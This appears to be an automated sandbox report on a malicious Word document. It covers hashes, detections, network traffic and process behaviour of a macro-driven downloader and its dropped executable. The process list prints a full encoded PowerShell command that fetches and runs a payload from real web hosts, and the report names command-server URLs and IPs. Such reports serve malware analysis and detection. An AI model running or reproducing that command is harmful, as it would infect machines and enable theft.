ID:	136644
Product:	CloudBasic
Start time:	17:23:53
Start date:	29.05.2019
Sample:	ATTACHMENT 654860 I32560.doc
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Architecture:	WINDOWS
MD5:	49fbc31d5e46d83c4741d64a1c268e8d
SHA1:	62b00133e2a78063b76a473a9c0b42a00b3042b8
SHA256:	8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5
Filetype:	Microsoft Word document (32009/1) 52.89%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\936.exe	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows	56F8EA5543A6C7FFA1731E614015673B	E9EFC20C941F80991CC9B023FC1982E282EE55D8	7221A5AC575F1C4812BE871A2BA7CFAF793D95E510E330DA59FE5329DDA3FCB6
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B10EFC4.wmf	Targa image data - Map - RLE 65536 x 65536 x 0 "\004"	8009110C7FF8AF053406C7E570B3A20F	F04CB43F7AA7426570EB25733D86667CEFED7ECD	221BDF477DA9F4E7CB54A57C57CBB45FA9AFEEA785943FA7F965674E6EE08819
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8B13890F.wmf	Targa image data - Map - RLE 28 x 65536 x 0 +7 "\004"	63E8885EC47799F13B279C5AEE576820	2FA9E4A6E7AC62FE59403E79F1DBF4A10B964CA9	D2B514E434CD0335B2FDB0BD128587A79A3AEF986EC2DA40E75F10AF60D1D738
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8D6547C6.wmf	Targa image data - Map - RLE 65536 x 65536 x 0 "\004"	6CB961EFDBA42C75DF3CA134D26482D7	21BE4FEDBF00B01F5027CD33E2DA994D705CB33C	A60C5ADB302573B79F7EA2B1233A8F552051DBDE3CE455FDF2C0B907ADFFD74A
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9745EEF8.wmf	Targa image data - Map - RLE 65536 x 65536 x 0 "\004"	656190E1EB52641D25425D47CF9BC0D3	774B114D8CFB1D078C1B0E350F4A31CE6C54A4C7	ABC59C4E9273EDD83C7B591FBA630D8BD691AE591F418735165DCB1C1DD0398D
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9D15CC13.wmf	Targa image data - Map - RLE 28 x 65536 x 0 +7 "\004"	30D99032BC162D65F53A8203AC7A6473	B42BBBCB11BF8764B015BF95B7AEB5A3275CA6F1	AF12B6DA9CCA2ACD33359ABAA38AFE860B17A4CB12FAAEDD07FD0460A2FFFE50
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1FBF299.wmf	Targa image data - Map - RLE 28 x 65536 x 0 +7 "\004"	32F47A4236F79CB95E6DF52EE18E4F65	EE40C35ECDD6657E026BBC8A249A16098F8B78C7	D403B1ABD724D4817546CEA2D39F3AA9250F39B45C75385A9250A7D79757A0F2
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A4C6EB18-0F5F-45A0-9BDD-379D366C92D6}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Temp\Word8.0\MSForms.exd	data	1CC24061B042480E1BEFDCFC9D11B57C	73AB807CC5DE1788A24EC9604D49A8FF53F0E719	A0682EBC657A233DA7EE5D370A76FE57BC12BE7F8A9F3F3A7DB03B7F2CAB8D7A
C:\Users\user\AppData\Local\Temp\imgs\cscheme.xml	XML 1.0 document, ASCII text, with CRLF line terminators	6B7A472A22FBDBFF4B2B08DDB4F43735	C6DF700168D3F5A90FF2713B78F8EF1446927102	65F3CDBC4390C81B94FA960B7362917443FC1E6A51E3F81E4CB4C4DFA09DA4BE
C:\Users\user\AppData\Local\Temp\imgs\editdata.mso	data	4DD4FC4C73B6182BCDEA7856134E5FD4	C50BC537ED45AF8454AE3DA54F3FE3274DE381F1	C55222C980C91159C8158A94B3F5EADCE594EFAB38784ED97A233E672A3B49C1
C:\Users\user\AppData\Local\Temp\imgs\filelist.xml	ASCII text, with CRLF line terminators	F7207358E8C5E04BB248222B8C042DDC	4B51E26943D35F9BD236683D50C19E5C2B2DDA78	9063C774748DDE015851EEFC3E265CC9BA8CE39EA028FC8E991FFD92EF0F286D
C:\Users\user\AppData\Local\Temp\imgs\img001.jpg	[TIFF image data, little-endian, direntries=1, copyright=Rrc4rsWQ0VDEIUGCpaZi], baseline, precision 8, 1410x622, frames 3	9F6A4E278108E34AB2E48EE86E7A42CC	D8952A831C76710A00587A29E94AD075C1AA9007	119703877446C5021CA1EA324AE9910F33DF1BCB109AC1C346C57BE13D276E3A
C:\Users\user\AppData\Local\Temp\imgs\img002.jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 625x276, frames 3	D11BA7520707DD96074383996A1A532D	12CACCA0251AAC40DC544EE25FD36C6B1F4D0744	BDE59F5323AA66724A91CB1DBB01913AB9767B2EBC578EF07459B6EBD61C85E0
C:\Users\user\AppData\Local\Temp\imgs\theme.thm	Microsoft OOXML	2B26E4DD316F857EBB6E2B6B0E1E0282	581AE91D57A710CF31348CD5F5AB6FD1B081291E	40BB5B5897D76A8EEFB7136E658BDDAA65F094C9689B931A78A01601F9EE02CB
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ATTACHMENT 654860 I32560.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Sep 24 13:01:36 2017, mtime=Sun Sep 24 13:01:36 2017, atime=Wed May 29 14:24:51 2019, length=141312, window=hide	FED5CFC70AA5FB2E209B75D54D8D44E9	F3740249F5160E63CF8241F302B9106BBE7CB147	87FBF2E83D5EB405CF2825711BB415C4331322884C60C353BE87FD3D10296E7D
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	FC9856B1122F3A5756ACAE72E4A0554A	F9B9C77E899740C9C319D7D41FA314174D9CF993	7CAE5E6106CE4B9D4A1AA74D7F9640737E0E901F4F57E6A2C7AB6365D60A58FE
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	FF291ADF1F74826EE3AA31EA36ADEC1C	9E647BCB57789C91D08C9B02D73ECD048239B5C5	08B022FE12FDA6C82FEEA4C0B2736E6FF757EA90DFF28CE43E7D44CD5FB4AE36
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G4SNEKM30O3SBQT9F62P.temp	data	E5752D8040565FB58BD5169853557385	205DDBFACBB6E3BAB10AA8CB8A2C05C8B32899F9	DFD29A03BF58158A247CF0405ECDD5E09974302D6781E96D3C82E753C4DB9F4E
C:\Users\user\Desktop\~$TACHMENT 654860 I32560.doc	data	FF291ADF1F74826EE3AA31EA36ADEC1C	9E647BCB57789C91D08C9B02D73ECD048239B5C5	08B022FE12FDA6C82FEEA4C0B2736E6FF757EA90DFF28CE43E7D44CD5FB4AE36

AV Detection:

Antivirus or Machine Learning detection for dropped file

Source: C:\Users\user\936.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for sample

Source: ATTACHMENT 654860 I32560.doc

Joe Sandbox ML: detected

Multi AV Scanner detection for domain / URL

Source: lastminutelollipop.com	virustotal: Detection: 10%			Perma Link
Source: http://lastminutelollipop.com/wp-admin/aEQlppdlfo/	virustotal: Detection: 11%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\936.exe

virustotal: Detection: 33%

Perma Link

Multi AV Scanner detection for submitted file

Source: ATTACHMENT 654860 I32560.doc

virustotal: Detection: 25%

Perma Link

Antivirus or Machine Learning detection for unpacked file

Source: 4.3.936.exe.540000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 5.3.936.exe.2d0000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 6.3.watsonbegin.exe.9a0000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.watsonbegin.exe.9a0000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.0.watsonbegin.exe.400000.0.unpack	Joe Sandbox ML: detected
Source: 4.1.936.exe.400000.0.unpack	Joe Sandbox ML: detected
Source: 7.2.watsonbegin.exe.400000.2.unpack	Joe Sandbox ML: detected
Source: 6.2.watsonbegin.exe.400000.2.unpack	Joe Sandbox ML: detected
Source: 4.3.936.exe.540000.0.unpack	Joe Sandbox ML: detected
Source: 5.0.936.exe.400000.0.unpack	Joe Sandbox ML: detected
Source: 6.0.watsonbegin.exe.400000.0.unpack	Joe Sandbox ML: detected
Source: 5.3.936.exe.2d0000.0.unpack	Joe Sandbox ML: detected
Source: 6.1.watsonbegin.exe.400000.0.unpack	Joe Sandbox ML: detected
Source: 7.1.watsonbegin.exe.400000.0.unpack	Joe Sandbox ML: detected
Source: 6.3.watsonbegin.exe.9a0000.0.unpack	Joe Sandbox ML: detected
Source: 5.1.936.exe.400000.0.unpack	Joe Sandbox ML: detected
Source: 4.0.936.exe.400000.0.unpack	Joe Sandbox ML: detected
Source: 5.2.936.exe.400000.1.unpack	Joe Sandbox ML: detected
Source: 4.2.936.exe.400000.2.unpack	Joe Sandbox ML: detected
Source: 7.3.watsonbegin.exe.9a0000.0.unpack	Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\936.exe	Code function: 5_2_00401D67 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,		5_2_00401D67
Source: C:\Users\user\936.exe	Code function: 5_2_00401E70 CryptDuplicateHash,memcpy,CryptEncrypt,CryptExportKey,CryptGetHashParam,CryptDestroyHash,		5_2_00401E70
Source: C:\Users\user\936.exe	Code function: 5_2_00401DED memset,CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,		5_2_00401DED
Source: C:\Users\user\936.exe	Code function: 5_2_00401F8A CryptDuplicateHash,memcpy,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,		5_2_00401F8A
Source: C:\Windows\System32\watsonbegin.exe	Code function: 7_1_00401D67 CryptDecodeObjectEx,LocalFree,		7_1_00401D67

Spreading:

Enumerates the file system

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch			Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: ceo.calcus.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.2:49222 -> 158.69.127.22:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.2:49221 -> 68.183.65.234:80

Networking:

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.2:49223 -> 31.12.67.62:7080

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49223 -> 7080
Source: unknown	Network traffic detected: HTTP traffic on port 7080 -> 49223

Connects to IPs without corresponding DNS lookups

Source: unknown	TCP traffic detected without corresponding DNS query: 31.12.67.62
Source: unknown	TCP traffic detected without corresponding DNS query: 31.12.67.62
Source: unknown	TCP traffic detected without corresponding DNS query: 31.12.67.62
Source: unknown	TCP traffic detected without corresponding DNS query: 31.12.67.62
Source: unknown	TCP traffic detected without corresponding DNS query: 31.12.67.62

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /wp-admin/aEQlppdlfo/ HTTP/1.1Host: lastminutelollipop.comConnection: Keep-Alive

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: unknown unknown
Source: Joe Sandbox View	ASN Name: unknown unknown

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: POST /badge/results/ HTTP/1.1Referer: http://31.12.67.62/badge/results/Content-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 31.12.67.62:7080Content-Length: 454Connection: Keep-AliveCache-Control: no-cacheData Raw: 33 53 71 7a 4e 4c 66 5a 69 3d 6d 61 36 51 4a 68 53 43 71 51 4a 5a 44 56 41 4d 59 35 51 62 56 70 46 6c 38 57 39 48 75 69 49 59 65 25 32 46 78 46 6e 25 32 42 75 52 44 4c 25 32 46 30 42 4a 35 4c 6e 42 69 63 6d 6a 47 37 70 45 6b 53 38 53 78 44 65 6b 79 25 32 46 6b 46 33 4e 51 66 56 33 53 76 39 59 6a 78 65 25 32 42 45 37 46 34 6f 45 55 6e 76 79 4b 52 4a 78 31 6c 78 31 69 31 41 72 31 34 4a 62 76 66 45 79 54 46 6f 58 66 46 72 32 52 6e 52 4b 6c 25 32 42 71 56 50 79 57 54 72 4a 37 6b 71 54 64 35 4e 39 59 52 64 71 5a 39 37 37 6b 4a 64 36 42 62 4a 58 5a 67 43 31 4a 4b 30 6c 72 6c 39 42 37 41 4c 34 35 55 62 7

Downloads files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word

Jump to behavior

Downloads files from webservers via HTTP

Source: global traffic

HTTP traffic detected: GET /wp-admin/aEQlppdlfo/ HTTP/1.1Host: lastminutelollipop.comConnection: Keep-Alive

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: ceo.calcus.com

Posts data to webserver

Source: unknown

HTTP traffic detected: POST /badge/results/ HTTP/1.1Referer: http://31.12.67.62/badge/results/Content-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 31.12.67.62:7080Content-Length: 454Connection: Keep-AliveCache-Control: no-cacheData Raw: 33 53 71 7a 4e 4c 66 5a 69 3d 6d 61 36 51 4a 68 53 43 71 51 4a 5a 44 56 41 4d 59 35 51 62 56 70 46 6c 38 57 39 48 75 69 49 59 65 25 32 46 78 46 6e 25 32 42 75 52 44 4c 25 32 46 30 42 4a 35 4c 6e 42 69 63 6d 6a 47 37 70 45 6b 53 38 53 78 44 65 6b 79 25 32 46 6b 46 33 4e 51 66 56 33 53 76 39 59 6a 78 65 25 32 42 45 37 46 34 6f 45 55 6e 76 79 4b 52 4a 78 31 6c 78 31 69 31 41 72 31 34 4a 62 76 66 45 79 54 46 6f 58 66 46 72 32 52 6e 52 4b 6c 25 32 42 71 56 50 79 57 54 72 4a 37 6b 71 54 64 35 4e 39 59 52 64 71 5a 39 37 37 6b 4a 64 36 42 62 4a 58 5a 67 43 31 4a 4b 30 6c 72 6c 39 42 37 41 4c 34 35 55 62 7

Urls found in memory or binary data

Source: watsonbegin.exe, 00000007.00000002.2322643441.00323000.00000004.sdmp

String found in binary or memory: http://31.12.67.62/badge/results/

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)

Source: C:\Users\user\936.exe

Code function: 5_2_00401D67 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,

5_2_00401D67

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Document image extraction number: 0

Screenshot OCR: Enable Editing and then click EnableContent

PE file has a writeable .text section

Source: 936.exe.2.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\936.exe

Jump to dropped file

Contains functionality to delete services

Source: C:\Users\user\936.exe

Code function: 5_2_0040C064 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle,

5_2_0040C064

Contains functionality to launch a process as a different user

Source: C:\Users\user\936.exe

Code function: 5_2_00401BB5 memset,CreateProcessAsUserW,CreateProcessW,

5_2_00401BB5

Creates mutexes

Source: C:\Windows\System32\watsonbegin.exe	Mutant created: \BaseNamedObjects\Global\I3C4E0000
Source: C:\Users\user\936.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\I3C4E0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\936.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\M3C4E0000

Detected potential crypto function

Source: C:\Users\user\936.exe	Code function: 4_2_0040491B		4_2_0040491B
Source: C:\Users\user\936.exe	Code function: 4_2_00402CCE		4_2_00402CCE
Source: C:\Users\user\936.exe	Code function: 4_2_004034DA		4_2_004034DA
Source: C:\Users\user\936.exe	Code function: 4_2_00403DF7		4_2_00403DF7
Source: C:\Users\user\936.exe	Code function: 5_2_0040491B		5_2_0040491B
Source: C:\Users\user\936.exe	Code function: 5_2_00402CCE		5_2_00402CCE
Source: C:\Users\user\936.exe	Code function: 5_2_004034DA		5_2_004034DA
Source: C:\Users\user\936.exe	Code function: 5_2_00403DF7		5_2_00403DF7
Source: C:\Users\user\936.exe	Code function: 5_1_00402CCE		5_1_00402CCE
Source: C:\Users\user\936.exe	Code function: 5_1_004034DA		5_1_004034DA
Source: C:\Users\user\936.exe	Code function: 5_1_0040491B		5_1_0040491B
Source: C:\Users\user\936.exe	Code function: 5_1_00403DF7		5_1_00403DF7
Source: C:\Users\user\936.exe	Code function: 5_1_00413389		5_1_00413389
Source: C:\Windows\System32\watsonbegin.exe	Code function: 7_1_0040491B		7_1_0040491B
Source: C:\Windows\System32\watsonbegin.exe	Code function: 7_1_00402CCE		7_1_00402CCE
Source: C:\Windows\System32\watsonbegin.exe	Code function: 7_1_004034DA		7_1_004034DA
Source: C:\Windows\System32\watsonbegin.exe	Code function: 7_1_00403DF7		7_1_00403DF7
Source: C:\Windows\System32\watsonbegin.exe	Code function: 7_1_00413389		7_1_00413389

Document contains an ObjectPool stream indicating possible embedded files or OLE objects

Source: ATTACHMENT 654860 I32560.doc

OLE indicator, ObjectPool: true

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: ATTACHMENT 654860 I32560.doc	OLE, VBA macro line: Sub autoopen( )
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function autoopen			Name: autoopen

Document contains embedded VBA macros

Source: ATTACHMENT 654860 I32560.doc

OLE indicator, VBA macros: true

Found potential string decryption / allocating functions

Source: C:\Users\user\936.exe

Code function: String function: 00401E2A appears 67 times

Reads the hosts file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\watsonbegin.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\watsonbegin.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Classification label

Source: classification engine

Classification label: mal100.troj.evad.winDOC@9/20@2/3

Contains functionality to create services

Source: C:\Users\user\936.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,		5_2_0040C134
Source: C:\Users\user\936.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,		5_1_0040C134

Contains functionality to enum processes or threads

Source: C:\Users\user\936.exe

Code function: 4_2_004020F4 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,lstrlenW,lstrcpyW,lstrlenW,

4_2_004020F4

Contains functionality to modify services (start/stop/modify)

Source: C:\Users\user\936.exe

Code function: 5_2_0040C134 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,

5_2_0040C134

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$TACHMENT 654860 I32560.doc

Jump to behavior

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user~1\AppData\Local\Temp\CVR80F5.tmp

Jump to behavior

Document contains an OLE Word Document stream indicating a Microsoft Word file

Source: ATTACHMENT 654860 I32560.doc

OLE indicator, Word Document stream: true

Document contains summary information with irregular field values

Source: ATTACHMENT 654860 I32560.doc

OLE document summary: edited time not present or 0

Found command line output

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........3.m.............3.m........L|.m......ak '.m..ak:.+.L|.md............7.m.......m....0.......t....... '.m...m....			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............|.......0...p......w...................w..0.....................................................>..w........			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............|...........p......w...................w..0.....................................................>..w........			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............|.......0...p......w...................w..0.....................................................>..w........			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............|...........p......w...................w..0.....................................................>..w........			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........,...|...#...0..........w,..................w..0.....................................#...............>..w........			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........,...|...#..............w,..................w..0.....................................#...............>..w........			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............|...'..............w...................w..0.....................................'...............>..w........			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............|...+..............w...................w..0.....................................+...............>..w........			Jump to behavior

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp			Jump to behavior

Queries process information (via WMI, Win32_Process)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Users\user\936.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Sample is known by Antivirus

Source: ATTACHMENT 654860 I32560.doc

virustotal: Detection: 25%

Sample requires command line parameters (based on API chain)

Source: C:\Users\user\936.exe

Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -e JABDAGwASQBFAFkAawAyAD0AJwBhAEoATgBNAEsARgAzAGwAJwA7ACQAUgB3AFkASwBDAHYATwAgAD0AIAAnADkAMwA2ACcAOwAkAFEAQgBWAGEAZAA5AD0AJwBMADgASABEAHoATgAnADsAJAB3AFgAcABiAFYAcAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUgB3AFkASwBDAHYATwArACcALgBlAHgAZQAnADsAJABHAEEAaQB6AHoANwA9ACcARABPAEkAbwBTAFQAJwA7ACQAVABiADkARQB1ADIASQByAD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAGUAdABgAC4AVwBlAEIAQwBgAEwAYABJAEUATgB0ADsAJABrAHUAVwBfAG8ANwBTADUAPQAnAGgAdAB0AHAAOgAvAC8AYwBlAG8ALgBjAGEAbABjAHUAcwAuAGMAbwBtAC8AcABvAHMAdABuAGUAdwBvAC8AUgB3AGgAdgBPAGwAWgBJAHMALwBAAGgAdAB0AHAAOgAvAC8AbABhAHMAdABtAGkAbgB1AHQAZQBsAG8AbABsAGkAcABvAHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGEARQBRAGwAcABwAGQAbABmAG8ALwBAAGgAdAB0AHAAOgAvAC8AawBhAHMAaABtAGkAcgBoAGEAYwBrAGUAcgBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB3AFEAWABoAG8AcgB0AFMAZgBKAC8AQABoAHQAdABwADoALwAvAG8AbQBlAGcAYQBjAG8AbgBzAHUAbAB0AG8AcgBpAGEAYwBvAG4AdABhAGIAaQBsAC4AYwBvAG0ALgBiAHIALwBz
Source: unknown	Process created: C:\Users\user\936.exe 'C:\Users\user\936.exe'
Source: unknown	Process created: C:\Users\user\936.exe --57fdbf8
Source: unknown	Process created: C:\Windows\System32\watsonbegin.exe C:\Windows\system32\watsonbegin.exe
Source: unknown	Process created: C:\Windows\System32\watsonbegin.exe --f36bf975
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\936.exe 'C:\Users\user\936.exe'			Jump to behavior
Source: C:\Users\user\936.exe	Process created: C:\Users\user\936.exe --57fdbf8			Jump to behavior
Source: C:\Windows\System32\watsonbegin.exe	Process created: C:\Windows\System32\watsonbegin.exe --f36bf975			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Users\user\936.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Document has a 'comments' value indicative of goodware

Source: ATTACHMENT 654860 I32560.doc

Initial sample: OLE summary comments = Tunisia policy

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Jump to behavior

Document has a 'manager' value indicative of goodware

Source: ATTACHMENT 654860 I32560.doc

Initial sample: OLE document summary manager = Torp

Document has a 'subject' value indicative of goodware

Source: ATTACHMENT 654860 I32560.doc

Initial sample: OLE summary subject = Maine

Data Obfuscation:

Document contains an embedded VBA with many string operations indicating source code obfuscation

Source: VBA code instrumentation	OLE, VBA macro, High number of string operations: Module dzpqM1P			Name: dzpqM1P
Source: VBA code instrumentation	OLE, VBA macro, High number of string operations: Module vawzMw			Name: vawzMw

Contains functionality to dynamically determine API calls

Source: C:\Users\user\936.exe

Code function: 4_2_004016FD LoadLibraryA,GetProcAddress,

4_2_004016FD

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\936.exe	Code function: 4_1_00406C15 push eax; retf		4_1_00406C93
Source: C:\Users\user\936.exe	Code function: 4_1_00406C2A push eax; retf		4_1_00406C93
Source: C:\Users\user\936.exe	Code function: 4_1_00407A34 push 0000007Fh; iretd		4_1_00407A3E
Source: C:\Users\user\936.exe	Code function: 4_1_004032CA push eax; ret		4_1_004032E3
Source: C:\Users\user\936.exe	Code function: 4_1_00404891 push cs; ret		4_1_004048BA
Source: C:\Users\user\936.exe	Code function: 4_1_00406C94 push ebx; retf		4_1_00406C9B
Source: C:\Users\user\936.exe	Code function: 4_1_00405296 push ecx; iretd		4_1_00405299
Source: C:\Users\user\936.exe	Code function: 4_1_00406159 push ecx; iretd		4_1_00406179
Source: C:\Users\user\936.exe	Code function: 4_1_00402F75 push ebp; ret		4_1_00402F7C
